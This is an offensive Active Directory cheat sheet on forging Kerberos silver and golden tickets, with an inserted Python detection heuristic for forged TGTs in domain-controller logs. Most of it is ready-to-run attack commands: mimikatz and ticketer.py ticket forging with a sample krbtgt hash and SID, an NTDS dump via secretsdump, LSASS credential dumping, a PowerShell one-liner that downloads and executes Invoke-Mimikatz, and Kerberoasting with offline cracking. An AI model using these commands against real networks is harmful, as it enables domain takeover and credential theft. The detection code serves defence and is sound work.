Silver and Golden Tickets

Ticket generation from Linux

# Generate a ticket or convert it (kekeo) to ccache format
$ ticketer.py -nthash <hash> -domain-sid <sid> -domain <domain> <user>

# Export the path in the right variable
$ export KRB5CCNAME=/tmp/ticket.ccache
$ klist

# Exec and use the ticket
$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host

# Dump NTDS
$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss


Golden Ticket

# Golden Ticket
> Administrator account name (Administrateur)
> Fully qualified domain name (domain.local)
> Domain SID (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]
> NTLM hash of the krbtgt account (6194bd1a5bf3ecd542e8aac9860bddf0)

mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt

mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt

Use:
mimikatz # kerberos::ptt domain.local.kirbi
mimikatz # kerberos::list
# Resource
https://twitter.com/mpgn_x64/status/1241688547037532161

# Golden ticket and access denied?
# from cmd (elevated)
> mimikatz kerberos::golden
> klist add_bind <DOMAIN> <DC>
> psexec \\dc cmd
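Defender's counterpart to the two golden-ticket recipes above, added here and not part of the original cheat sheet: a forged TGT skips the AS exchange, so the domain controllers see a 4769 (service ticket request) for the account with no 4768 (TGT issued) in the preceding ticket lifetime, and since ticketer.py and kerberos::golden accept any user name, a 4769 for an account absent from the directory is a second indicator. The event records and the account list are constructed samples.

```python
"""Heuristics for spotting forged TGTs (golden tickets) in DC Security logs.
Added example; the 4768/4769 records below are constructed, not real logs.
Two checks: a 4769 with no 4768 for the same account inside the TGT
lifetime, and a 4769 for an account that does not exist in the directory."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of 4768/4769 events (relevant fields only).
EVENTS = [
    {"id": 4768, "ts": "2024-03-01T08:00:00", "account": "alice", "ip": "10.0.0.5"},
    {"id": 4769, "ts": "2024-03-01T08:00:03", "account": "alice", "ip": "10.0.0.5",
     "service": "cifs/fs01"},
    # no 4768 for this account anywhere in the window
    {"id": 4769, "ts": "2024-03-01T09:15:00", "account": "Administrateur",
     "ip": "10.0.0.77", "service": "cifs/dc01"},
    # account name that does not exist in the directory
    {"id": 4769, "ts": "2024-03-01T09:20:00", "account": "svc_nobody",
     "ip": "10.0.0.77", "service": "ldap/dc01"},
]
# Constructed: sAMAccountNames exported from the directory (compared lowercase).
KNOWN_ACCOUNTS = {"alice", "administrateur", "krbtgt"}
TGT_LIFETIME = timedelta(hours=10)  # AD default MaxTicketAge

def find_suspicious_tgs(events, known_accounts=KNOWN_ACCOUNTS, window=TGT_LIFETIME):
    """Return [(account, timestamp, [reasons])] for 4769 events with no
    plausible TGT behind them. Feed it events merged from ALL DCs: a TGT
    issued by one DC and used against another is normal and must not alert."""
    tgt_times = defaultdict(list)  # account -> timestamps of 4768 events
    for e in events:
        if e["id"] == 4768:
            tgt_times[e["account"].lower()].append(datetime.fromisoformat(e["ts"]))
    findings = []
    for e in events:
        if e["id"] != 4769:
            continue
        acct, ts = e["account"].lower(), datetime.fromisoformat(e["ts"])
        reasons = []
        if not any(timedelta(0) <= ts - t <= window for t in tgt_times[acct]):
            reasons.append("TGS request with no preceding 4768 in TGT lifetime")
        if acct not in known_accounts:
            reasons.append("account does not exist in the directory")
        if reasons:
            findings.append((e["account"], e["ts"], reasons))
    return findings

if __name__ == "__main__":
    for acct, ts, why in find_suspicious_tgs(EVENTS):
        print(f"{ts} {acct}: {'; '.join(why)}")
```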


Playing with tickets on Windows

# Current sessions
mimikatz # sekurlsa::logonpasswords

# Ticket TGT
# Dump SPN
PS C:\> Find-PSServiceAccounts -DumpSPN
Discovering service account SPNs in the AD Domain foo.local
svcSQLServ/pc1.foo.local:1433

# Download Mimikatz
PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
PS C:\> Invoke-Mimikatz
mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

# List active tickets or purge them
PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'
PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'
PS C:\> klist

# Request a ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"

# Export a ticket
mimikatz # kerberos::list /export

# Crack Ticket
python tgsrepcrack.py wordlist.txt ticket.kirbi